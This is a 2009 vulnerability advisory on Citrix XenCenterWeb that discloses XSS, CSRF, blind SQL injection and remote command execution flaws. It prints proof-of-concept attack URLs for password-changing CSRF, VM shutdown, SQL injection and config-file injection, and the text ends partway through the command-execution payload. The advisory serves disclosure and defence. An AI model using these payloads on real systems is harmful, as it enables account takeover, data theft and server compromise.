Secure Network - Security Research Advisory
Vuln name: Citrix XenCenterWeb Multiple Vulnerabilities
Systems affected: Citrix XenCenterWeb
Systems not affected: n/a
Severity: High
Local/Remote: Remote
Vendor URL: http://www.citrix.com
Author(s): Alberto Trivero a.trivero@securenetwork.it -
Claudio Criscione c.criscione@securenetwork.it
Vendor disclosure: 1/06/2009
Vendor acknowledged: 11/06/2009
Vendor patch release: n/a
Public disclosure: 06/07/2009
Advisory number: SN-2009-01
Advisory URL: http://securenetwork.it/ricerca/advisory/download/SN-2009-01.txt
*** SUMMARY ***
Citrix XenCenterWeb is a web interface for Citrix XenServer environment
management.
Users of XenCenterWeb will be able to see a list of Virtual Machines in the
Resource Pool, perform life-cycle actions (start, shutdown, restart, etc.),
get basic information about the hosts in the Resource Pools, information about
the VMs and also connect to the console of the VMs.
Due to poor validation of some user controlled inputs, a variety of attacks
against the application and the underlying server are possible.
Cross-site scripting, cross-site request forgery, SQL injection and remote
command execution attack vectors were identified as well.
XSS and CSRF attacks can be performed on the virtual appliance itself, while
the others require the PHP parameter magic_quotes_gpc to be off on the web
server.
*** VULNERABILITY DETAILS ***
(a) Cross-site Scripting (XSS) and Cross-site Request Forgery (CSRF)
With the default PHP configuration (register_globals=Off and
magic_quotes_gpc=On), both XSS and CSRF attacks can be executed.
The first XSS attack exploits the lack of sanitization in the username
parameter in edituser.php script and requires the victim to be able to access
configuration scripts:
https://xencenterweb.loc/config/edituser.php?username=1
Under the same conditions, a CSRF attack can be executed to change the
password of an arbitrary user:
https://xencenterweb.loc/config/changepw.php?username=[victim_username]&newpass=[attacker's_chosen_pwd]
Another CSRF attack can hard stop a VM of the attacker's choice:
https://xencenterweb.loc/hardstopvm.php?stop_vmref=[VMref]&stop_vmname=[VMname]
Other XSS vulnerabilities afflict scripts which are accessible by anyone:
https://xencenterweb.loc/console.php?location=1"><"&vmname=myVM
https://xencenterweb.loc/console.php?location=1&sessionid=1"><"&vmname=myVM
https://xencenterweb.loc/console.php?location=1&sessionid=1&vmname=myVM
https://xencenterweb.loc/forcerestart.php?vmrefid=1"><"&vmname=myVM
https://xencenterweb.loc/forcerestart.php?vmrefid=1&vmname=myVM"><"
https://xencenterweb.loc/forcesd.php?vmrefid=1&vmname=myVM"><"
https://xencenterweb.loc/forcesd.php?vmrefid=1"><"&vmname=myVM
(b) SQL Injection
The username parameter in the login.php script is vulnerable to a Blind SQL
Injection attack.
An attacker can retrieve the whole database schema through specially crafted
requests.
Here is an example proof of concept:
https://xencenterweb.loc/login.php?username=user' UNION SELECT if(user() LIKE
'root@%', benchmark(1000000,sha1('test')), 'false')/*
Obviously, other high profile attacks can be performed through this attack
vector.
(c) Remote Command Execution
An attacker could write arbitrary data in the file
/usr/local/lib/php/include/config.ini.php
through the file /var/www/config/writeconfig.php. Due to this unsecure behavior,
arbitrary commands can be executed on the machine.
If a victim with the proper authorization follows this link:
https://xencenterweb.loc/config/writeconfig.php?pool1='; ?>